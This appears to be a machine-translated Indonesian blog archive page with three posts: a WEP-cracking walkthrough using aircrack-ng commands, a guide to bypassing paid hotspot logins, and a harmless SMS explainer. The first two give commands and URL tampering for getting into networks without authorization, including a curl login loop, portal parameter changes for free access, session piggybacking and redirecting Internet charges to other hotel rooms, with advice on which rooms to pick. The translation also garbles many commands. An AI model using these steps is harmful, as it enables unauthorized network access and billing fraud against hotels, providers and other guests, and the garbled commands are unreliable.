Tampilkan postingan dengan label Wireless technology. Tampilkan semua postingan
Tampilkan postingan dengan label Wireless technology. Tampilkan semua postingan

Entering Hotspot protected with WEP

Senin, 05 Januari 2009

For that you have a laptop instead of AXIO to the top and equipped Wireless, let us practical beauty "air property" with a little learning. Do not just for typing papers and watching miyabi. 

Booting with BackTrack V2.0 (or v3.0), make sure you reach the Hotspot 
Card best use Atheros. If no, alternative: 3Com 3CRPAG175B, 3Com 3CRXJK10075, DLINK DWL-G630 Rev C, Linksys WPC55AG, TrendNET TEW-441PC, TrendNET TEW-443PI, TP-LINK TL-WN610G 
consol 
airmon-ng stop ath0  \ ___ wireless monitoring and injection 
airmon-start wifi0 ng
airodump-ng ath0 

Consider this example table: 

BSSID PWR Beacons Data # H / S CH MB ENC Cipher AUTH ESSID 
00:19:5 B: 5C: 62:92 9 57 5 0 6 54 WEP WEP REK-1 
00:17:9 A: C0: 50:3 E 7 66 92 0 1 54 OPN Hall_G 

etc.. 

airodump-ng-channel 6-bssid 00:19:5 B: 5C: 62:92-w results ath0 <- collecting data before cracking WEP. note on the table 

consol 
aireplay-ng-arpreplay-b 00:19:5 B: 5C: 62:92-h 00:19: D2: 45: D0: EB ath0 <- 00:19: D2: 45: D0: EB is the MAC-Address his 
aircrack-ng results *. stamp <- time t Crack! 
aircrack-ptw results-01.cap <- or this! 

Use facilities WarDriving!

Read more...

Hacking Wireless Acces Point

Jumat, 02 Januari 2009

There are many things that someone can do to outsmart the process authentication. Some of the ways discussed in this article only covers a small aspect of the design using the weaknesses of a wireless hotspot gateway. Given that the materials have been presented in front of the public, most likely the service provider and vendors of products that have been affected improve midst is. 

As a notice, no vendor name that will be associated with a slit that I find. Please gather your own estimate. And tricks that can only be explained.

1. Use the demo account. 

Many service providers be careful to give the opportunity for prospective users to be able to access the Internet in the period Time is limited. At the authentication page is usually mentioned username and password for testing purposes. 

Someone using an account trial / demo should do re-authentication after the end of the period. However, it can be done automatically by using the script Like this. 

-------------------------------------------------- ------------------- 
#! / Bin / sh 

While sleep 3; 
Do 
Curl - data 
"username = demo & password = demo & submitForm = login" 
"https: / / server: port / goform / HtmlLoginRequest"; 
Done 
-------------------------------------------------- ------------------- 

2. Using tunneling. 

Some of the implementation of the hotspot can be utilized with Tunneling method. Implementation of the implementation is do not block the port or protocol against Certain. 0x05 

For example, a hotspot only to make the diversion all queries to the HTTP and HTTPS authentication for the login page Users who have not terautentikasi. You can use the socks-tunneling via SSH port because that is not used for SSH Terfilter. You can add the option 'DynamicForward' on SSH your user configuration (see the file ~ / .ssh / config). 

-------------------------------------------------- ------------------ 
... 
Host titanium 
Hostname titanium.justanotherrandomdomain.com 
Port 22 
Users whfb 
DynamicForward 22344 
... 
-------------------------------------------------- ------------------ 

If you are connecting to the SSH host titanium, the Automatic, will open port 22344. You can add the IP 127.0.0.1 and port 22344 on the network configuration in a web browser Your choice for SOCKS proxy. 

However, the above is not always successful because gateway to the diversion of all TCP and UDP ports. To outsmart conditions, if you can take advantage of DNS tunneling. 
Why DNS protocol? Because most service providers do not to block or to query DNS. 

Please refer to the reference DNS Tunneling [3] [4] [5] [6] [7]. 

3. Utilizing rift on a web application portal Internet gateway. 

I find the following tricks when I get a chance the opportunity to stay in one of the famous hotel and found the wireless hotspot service is available in the lobby. 

At the authentication page, I provided several options for Make payments, among others: 

A. login using the username and password from the pre-paid can Purchased in the lobby, 
B. login using the username and password from the service and iPass Boingo 

After observing the correct source-code of a web page that is used for authentication purposes, I see where the awkwardness have a choice billing_method_id is 2, and a choice of b Have any billing _method_id is 3. So my question is that time is what the options that have billing_method_id Is 1. With niatan try-try, I change the variable ago billing_method_id query with a value of 1, that I can Direct access to the Internet. 

-------------------------------------------------- ------------------ 
http://host/defaultportal/check_form.cgi?&billing_method_id=1 
-------------------------------------------------- ------------------ 

Later the day after I had borrowed the product used as an Internet gateway, I know that 
billing_method_id with a value of 1 is a choice to make Billing on the room. Something that is not possible because I access it using the wireless from the lobby. I know that the only option 
effective if the customer is not using the cable and wireless. 

4. Changing the IP address 

Found the implementation of some of the known wireless hotspot share allocation on the user's IP address is not yet autentication And users who already terautentikasi. After the user successfully through the process of authentication, the gateway will remember the MAC address 
And give you a new IP address (on the new subnet) for User. 

Using software such as packet sniffer or tcpdump ethereal (now wireshark), you can find out what IP address Just across the wireless network you. You can surmise, conjecture own IP address allocation of 'new' with the following netmask it. 

For example, if you have not yet IP autentication with the address 10.0.0.14 netmask 255.255.255.0, and after your autentication, you get the IP address 10.0.1.18 Netmask 255.255.255.0. 

If you do not want to make the process of authentication, you can simply mengkonfigur IP Address in the range of your network users who are autentication. 

5. Piggyjacking 

I piggyjacking defines as activities to obtain access to a wireless access to the session took session that is first to get access Internet autentication. 

To do this, you need information: 
- IP address and MAC address users who already terautentikasi 
- IP address gateway 

You can refer to the presentation Dean Pierce, Brandon Edwards & Anthony Lineberry given at DEFCON 13 [8] to use Software 'Pul'. If you want to do with the method manual, you can follow the procedure mentioned in the Point 4 above. 

6. SQL Injection on the portal application gateway 

Some hotspot that can diakali using the technique SQL injection. I think that does not need to explain more about this technique because it is often discussed. Not only for mem-by-pass access to the Internet, this technique can also be mem-by-pass Administrative authentication page. 

7. Move the bill to another room. 

If you are lucky to stay in hotels that provide services Internet Speed cables on hotel rooms. You may Can apply this trick. Tricks following can only be done on the cable network in the hotel (not related to wireless), but I study here because the product is used as a gateway With a wireless hotspot services. 

You may be able to 'pester' switch with other people Internet billing your room or mengalihannya to empty rooms. 

For example, you can modify the query such as the following HTTP This 
-------------------------------------------------- ------------------ 
http://HOTSPOT_GATEWAY/mlcbb/mlc/welcome.asp?UI=012345 & 
UURL = & http://BILLING_SERVER/userok.htm&MA=00AABBCCDDEE&RN=1234 
Http://google.com/&SC=12345 
-------------------------------------------------- ------------------ 
You can simply change the value 00AABBCCDDEE (MAC address) and 1234 
(The room). Billing will be made in the room if the new room 
Exist. 

For safe, I suggest you search the room used for public purposes such as a lobby or ballroom.

Read more...

SMS (Short MessageService)

Senin, 01 Desember 2008

Part of the SMS 1.1 Lifestyle
Wireless technology developed very quickly end this end. Several years ago, a cellular phone (mobile phone) with the present display hitamputih (didn't), a ringtone is the sound of the style measure, a form that is large enough, and enough standard functions. Imagine the situation now. The latest mobile phone output, usually have layers of color already, complete with Mega pixel camera that is integrated, and the Polyphonic ring tones are tolerably good to be heard. Now, we can see the email via mobile phone by using the GPRS connection, not to stop there, the presence of 3G technology allows us to do video streaming via mobile phone us.

However, with present technology that is already very sophisticated, there is one technology that is still used and remains a favorite from the first until now. What is technology? Yes, technology is called SMS. The scenery is not a new one, if we go to a place, we see people are holding ponselnya with one hand and push the buttons using the thumbs hands with the very businesslike. With easy we have been able to guess that people are learner-SMS raptures. Perhaps because of cost factors SMS cheaper than doing in the phone conversation to make us more often than send the SMS call. Moreover, for those who already have a pair, a day may not be effective if not, send SMS messages containing graphics? to the spouse, unless circumstances are mobile empty remaining CE-Greetings' Honestly, he's .. .. .. um

1.2 History of SMS
SMS is a standard feature of the Global System for Mobile Communication (GSM). This facility is used to send and receive messages in the form of text to and from a mobile phone. To use the SMS feature, users need to complete mobile facilities with the following:
- Using the SIM card (Subscriber Identity Module) from the GSM service provider that supports SMS.
Using a mobile phone that supports SMS.
Can be said that all the facilities had already become a standard mobile phone. SMS was first tested in December 1992 through a computer to a mobile phone in the Vodafone GSM network in the UK. Furthermore, the SMS technology and developing the type of application that can be used to increase. The length of the message can be sent in one shipment reached 160 characters or 70 characters if using non-Latin characters, such as Arabic or Chinese. Currently, all mobile phone factory without exception requires the products have been able to use SMS facilities.

SMS 1.3 Characteristics
Some characteristics of the SMS is:
- A short message consists of 160 characters that include letters or numbers. Can also support non-text messages, such as a binary format.
- Principle is working to save and to convey the message (store and forward message). In other words, the message is not sent directly to the recipients saved first, but in the SMS-Center.
- Having the characteristics in the delivery confirmation message, the message sent is not sent in a simple and reliable to be presented with the survivors. However, the message sender can also receive a message back that tells whether the message was sent or failed.

1.4 SMS Center (SMSC)
A SMSC is responsible for handling SMS messages on a wireless network (wireless). When an SMS sent by mobile phone, SMS is the first time will be displaced by the SMSC, and then will be forwarded to the destination number. This system is known as Store and Forward. This means that the message will be featured in the SMSC before forwarded to the destination number. If the destination number is not active, then the message will remain stored in the SMSC until the active message out. Sometimes an SMS message must go through several different networks (SMSC and SMS Gateway) prior to the goal.

1.5 Benefits The use of SMS
The use of SMS is not directly have been dominating most of the mobile phone users in the world. Of course, this is accompanied with the benefits and advantages of the SMS itself. Basically, SMS has the following benefits:
- Receive and send messages, both the standard message, notification, and others.
- Ability to send a message to many destination number at the same time. Have a high failure send a very small so that the message will most likely be up to the goal.
- It is a communication mechanism requires that the cost is quite cheap.

1.6 Protocol Used SMS
SMS sent and received via the wireless network. Protocol, which is often used by SMS is as follows.
- HTTP (hypertext transfer protocol). HTTP protocol is the most frequently used in the Internet today. HTTP main goal is to initially provide a way to take in the present and from HTML pages. Currently, the use of HTTP is not limited in serving HTML pages only. Development of HTTP controlled by the World Wide Web Consortium (W3C) and Internet Engineering Task Force (IETF). HTTP version of the ordinary at this time is used HTTP/1.1. Explanation of this version can be seen in RFC 2616 that can be accessed through the address http://www.ietf.org/rfc/rfc2616.txt.
- SMPP (Short Message Peer-to-Peer Protocol). SMPP is a protocol that is designed specifically to handle the SMS. SMPP per first time designed by a small company called Aldiscon Ireland, before eventually purchased by LOGICA. In 1999, officially the development of technology SMPP taken over by SMPP Developers Forum, to be renamed before the SMS Forum. SMPP version that is most widely used version 3.3 (the version with the ability of the standard) and version 3.4, a version in which the ability to add transceiver (the ability to send and receive messages in one connection). Currently, plus the ability to continue SMPP and SMPP has now reached version 5.0.

Behind the SMS Business Opportunity
Remember when the author is a day to drop a friend home campus. When arriving at the house, the incidental friend is out briefly. Her younger sister at the time of grade 3 junior and finished the new National Final Exam accompany me for a chat-chat. I ask him, What results Testimonials keterima in high school and where? He said, Wow, I did not know. I check via SMS sajaĆ®. Wow, now can be checked via SMS it?, Jawabku. Not long after, people come. In fact, he just buy a voucher worth Rp100.000 balance. Buy a voucher that is normal, but that makes me upset, 2 days ago my friend to buy the new voucher worth Rp50.000. Boros think once again, but after I know the reason, I understand. In fact, my friend was curious to follow a quiz, which has a major mobile phone output added. And the winner is not taken by diundi, but points from the SMS obtained if successful quiz with the correct answer.
Short stories above illustrate that SMS is very helpful and can be used as a fertile business field. Almost all the events in the television using the SMS facility in the poll or a quiz. A Premium SMS. The charge is more expensive than the cost of sending SMS usual, but with the prize, and do not make people reluctant to send the SMS Premium.
If counted, Premium SMS tariffs to quiz the average - the average per Rp2.000 once tell. Assuming only that the quiz is only 1 / 10 of the Jakarta population totaling about 10 million people. Means that 1 million people / SMS Rp2.000 X = Rp2.000.000.000 (two billion rupiah). Deserve it, providers have to provide a quiz prize of a luxury car costing around Rp400.000.000. And whether it difficult to create the SMS service? The answer is not. Indeed, if you want to create a Premium SMS, which has different rates, we must work with the wireless service provider (operator / provider). However, if only to create interactive applications that SMS has the same functionality with SMS Premium, which needed only a computer connected to the phone through a data cable programming plus the ability that is not too difficult.

source: http://needsms.com/

Read more...

  © Blogger template Columnus by Ourblogtemplates.com 2008

Back to TOP